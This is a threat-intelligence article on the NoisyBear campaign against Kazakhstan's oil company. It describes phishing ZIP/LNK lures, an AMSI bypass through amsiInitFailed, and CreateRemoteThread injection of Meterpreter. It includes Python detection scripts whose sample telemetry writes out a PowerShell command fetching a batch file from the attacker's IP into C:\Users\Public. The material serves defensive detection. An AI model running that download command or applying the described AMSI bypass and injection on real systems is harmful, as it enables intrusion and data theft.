NoisyBear Weaponizes ZIP Files to Deliver PowerShell Loaders and Exfiltrate Sensitive Data


A threat actor identified as NoisyBear has emerged, posing a significant threat to Kazakhstan’s energy sector. This group employs advanced tactics, including weaponized ZIP files and PowerShell-based attack chains, to infiltrate critical infrastructure.

NoisyBear targets KazMunaiGas (KMG), the national oil and gas company, through phishing emails that mimic legitimate internal communications regarding salary schedules and policy updates.

The attack relies on social engineering: the group compromised legitimate business email accounts inside KazMunaiGas and sent the lures from them, which makes the messages look authentic to recipients.

The emails contain ZIP attachments disguised as urgent HR-related documents, creating a false sense of legitimacy and encouraging interaction from employees.

This campaign is sophisticated, using multi-stage payload delivery systems that leverage trusted system binaries and PowerShell execution environments to maintain stealth during the infection process.

Seqrite researchers identified the activities of this threat group in April 2025, with campaigns intensifying in May 2025.

Evidence suggests Russian origins, indicated by Russian language comments within malicious code, use of sanctioned hosting services, and targeting patterns aligned with geopolitical interests in Central Asian energy resources.

Infrastructure analysis reveals connections to Aeza Group LLC, a sanctioned hosting provider, which complicates attribution and takedown efforts.

The malware’s impact includes advanced persistence mechanisms and defense evasion techniques, allowing prolonged network access and potential exposure of sensitive corporate communications and strategic planning documents.

Infection Mechanism and Technical Analysis

The NoisyBear infection chain starts with ZIP files containing a decoy document with the KazMunaiGas logo, a README.txt file with execution instructions, and a weaponized LNK file named “График зарплат.lnk” (Salary Schedule.lnk).

The malicious shortcut file uses PowerShell as a Living Off The Land Binary (LOLBIN) to download and run the next stage, so no new executable touches disk at this point.

Upon execution, the LNK file initiates a PowerShell command to retrieve a batch script named “123.bat” from the server “77.239.125.41:8443”.

This script is placed in the C:\Users\Public directory, which is writable by every local user and is often subject to less monitoring than per-user profile paths.

The batch script functions as a secondary loader, downloading PowerShell scripts referred to as “DOWNSHELL” by researchers.

These loaders employ Anti-Malware Scan Interface (AMSI) bypass techniques, using reflection to manipulate the System.Management.Automation.AmsiUtils class.

The malware sets the “amsiInitFailed” field to true, which makes AMSI report that initialization failed; PowerShell then skips scanning of the script content that follows, allowing subsequent malicious operations to run unchecked.
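The two behaviours described above, a PowerShell download cradle writing a .bat into C:\Users\Public and reflection against AmsiUtils, both leave traces in process-creation and script-block logging. The following Python is an added detection example, not code from the article or from Seqrite: it scores constructed sample events (Sysmon EID 1 command lines and PowerShell EID 4104 script blocks) against a small indicator table. The indicator names, weights and threshold are assumptions for illustration, not a published rule set; the IP and file names in the first sample are those reported in the article.

```python
import re

# Constructed indicator table for the delivery chain described above: a PowerShell
# download cradle pulling a .bat from a raw IP:port into C:\Users\Public, and
# reflection against System.Management.Automation.AmsiUtils / amsiInitFailed.
# Pattern names and weights are assumptions for this example, not a vendor rule set.
INDICATORS = {
    "download_cradle": (re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I), 1),
    "raw_ip_url": (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?", re.I), 2),
    "public_dir_write": (re.compile(r"C:\\Users\\Public\\", re.I), 1),
    "batch_stage": (re.compile(r"\.bat\b", re.I), 1),
    "evasion_switches": (re.compile(r"-(?:nop|noprofile)\b|-(?:ep|ExecutionPolicy)\s+bypass|-(?:w|windowstyle)\s+hidden", re.I), 1),
    # Legitimate scripts have no reason to touch these internals; the weight alone reaches the threshold.
    "amsi_reflection": (re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I), 3),
}
ALERT_THRESHOLD = 3


def score_event(text):
    """Score one command line (Sysmon EID 1) or script block (PowerShell EID 4104).

    Returns (score, sorted list of matched indicator names)."""
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[name][1] for name in hits), hits


def triage(events, threshold=ALERT_THRESHOLD):
    """Return (event id, score, hits) for every event scoring at or above the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev["text"])
        if score >= threshold:
            flagged.append((ev["id"], score, hits))
    return flagged


# Constructed sample telemetry. The first event mirrors the LNK stage described in the
# article; the third is a deliberately truncated script block naming the AMSI internals.
SAMPLE_EVENTS = [
    {"id": "lnk-stage", "source": "Sysmon EID 1",
     "text": r'powershell.exe -c "Invoke-WebRequest http://77.239.125.41:8443/123.bat -OutFile C:\Users\Public\123.bat"'},
    {"id": "admin-script", "source": "Sysmon EID 1",
     "text": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"id": "amsi-bypass", "source": "PowerShell EID 4104",
     "text": "...GetType('System.Management.Automation.AmsiUtils')...GetField('amsiInitFailed'...)"},
    {"id": "software-update", "source": "Sysmon EID 1",
     "text": r"Invoke-WebRequest https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi"},
]

if __name__ == "__main__":
    for event_id, score, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT {event_id}: score={score} indicators={', '.join(hits)}")
```

The weighting is deliberate: a download cradle or an ExecutionPolicy bypass on its own is common in administration scripts and stays below the threshold, whereas any reference to AmsiUtils or amsiInitFailed is flagged by itself because script block logging (EID 4104) captures the de-obfuscated content even when the original script was encoded.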

The final stage injects code into explorer.exe using the classic CreateRemoteThread technique.

The malware uses OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread API calls to inject Meterpreter reverse shell capabilities, establishing persistent backdoor access for data exfiltration and remote command execution.
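Each step of that API sequence is visible to Sysmon: OpenProcess appears as a ProcessAccess event (EID 10) carrying the GrantedAccess mask, and CreateRemoteThread appears as EID 8 with the source image, target image and the module (if any) backing the thread's start address. The following Python is an added example, not code from the article or from Seqrite: it correlates constructed EID 10 and EID 8 records to flag a script host creating a thread in explorer.exe. The access-right constants are the documented winnt.h values; the script-host list and severity scheme are assumptions for this example.

```python
import os

# Access rights the injection sequence needs on the target handle (winnt.h values).
PROCESS_CREATE_THREAD = 0x0002   # CreateRemoteThread
PROCESS_VM_OPERATION = 0x0008    # VirtualAllocEx
PROCESS_VM_WRITE = 0x0020        # WriteProcessMemory
INJECTION_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # 0x2A

# Script hosts with no legitimate reason to create threads in explorer.exe.
# Constructed list for this example; tune it for the environment.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return os.path.basename(path.replace("\\", "/")).lower()


def detect_remote_thread_injection(events, target="explorer.exe"):
    """Correlate Sysmon ProcessAccess (EID 10) and CreateRemoteThread (EID 8) records.

    Returns one alert per remote thread created in `target` either by a script host or
    from a start address that no loaded module backs. Severity is raised to high when an
    earlier handle from the same source to the same target carried the rights needed
    for VirtualAllocEx, WriteProcessMemory and CreateRemoteThread."""
    granted = {}  # (source_pid, target_pid) -> union of GrantedAccess bits seen so far
    alerts = []
    for ev in events:
        key = (ev["source_pid"], ev["target_pid"])
        if ev["event_id"] == 10:
            granted[key] = granted.get(key, 0) | int(ev["granted_access"], 16)
            continue
        if ev["event_id"] != 8 or basename(ev["target_image"]) != target:
            continue
        src = basename(ev["source_image"])
        reasons = []
        if src in SCRIPT_HOSTS:
            reasons.append("source is a script host")
        if not ev.get("start_module"):
            reasons.append("thread start address is not backed by a loaded module")
        if not reasons:
            continue
        correlated = (granted.get(key, 0) & INJECTION_MASK) == INJECTION_MASK
        if correlated:
            reasons.append("earlier handle granted create-thread, vm-write and vm-operation rights")
        alerts.append({"source": src, "source_pid": ev["source_pid"], "target": target,
                       "severity": "high" if correlated else "medium", "reasons": reasons})
    return alerts


# Constructed sample telemetry, in the order Sysmon would record it.
SAMPLE_EVENTS = [
    # OpenProcess with PROCESS_ALL_ACCESS from the PowerShell loader to explorer.exe
    {"event_id": 10, "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "source_pid": 4120, "target_image": r"C:\Windows\explorer.exe", "target_pid": 3004,
     "granted_access": "0x1FFFFF"},
    # Antivirus engine opening explorer.exe with query-only rights: benign
    {"event_id": 10, "source_image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "source_pid": 2200, "target_image": r"C:\Windows\explorer.exe", "target_pid": 3004,
     "granted_access": "0x1000"},
    # CreateRemoteThread from the loader; an empty StartModule means unbacked memory
    {"event_id": 8, "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "source_pid": 4120, "target_image": r"C:\Windows\explorer.exe", "target_pid": 3004,
     "start_module": "", "start_function": ""},
    # Thread created by csrss.exe starting inside ntdll.dll: normal Windows behaviour
    {"event_id": 8, "source_image": r"C:\Windows\System32\csrss.exe", "source_pid": 612,
     "target_image": r"C:\Windows\explorer.exe", "target_pid": 3004,
     "start_module": r"C:\Windows\System32\ntdll.dll", "start_function": "RtlUserThreadStart"},
]

if __name__ == "__main__":
    for alert in detect_remote_thread_injection(SAMPLE_EVENTS):
        print(f"[{alert['severity'].upper()}] {alert['source']} (pid {alert['source_pid']}) -> {alert['target']}")
        for reason in alert["reasons"]:
            print("   -", reason)
```

The correlation matters because EID 8 alone fires for legitimate Windows components, whereas a prior handle carrying exactly the write-plus-create-thread rights from an interactive script host is the combination the article's OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread sequence produces.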
